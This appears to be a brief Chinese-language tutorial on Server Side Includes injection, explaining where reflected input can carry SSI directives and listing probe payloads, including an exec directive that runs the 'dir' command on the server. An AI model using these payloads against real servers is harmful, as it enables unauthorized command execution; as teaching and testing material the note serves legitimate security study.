ssi注入

原文链接：http://wyb0.com/posts/ssi-injection/

0x00 SSI

SSI (Server Side Includes)是HTML页面中的指令，在页面被提供时由服务器进行运算，以对现有HTML页面增加动态生成的内容，而无须通过CGI程序提供其整个页面，或者使用其他动态技术。

在很多场景中，用户输入的内容可以显示在页面中，一个存在反射XSS漏洞的页面，如果输入的payload不是xss代码而是ssi的标签，服务器又开启了ssi支持的话就会存在SSI漏洞

若注入点在url中则可能需要进行url编码

0x01 payload

"-->'-->`--><!--#set var="a" value="123"--><!--#set var="b" value="654"--><!--#echo var="a"--><!--#echo var="b"-->

<!--#echo var="DATE_LOCAL" -->

<!--#exec cmd="dir" -->

0x02 示例

• Referer被输出到了页面中

  
  图片.png

• url中的数据被输出到页面中(有时候url中的payload需要url编码)

  
  图片.png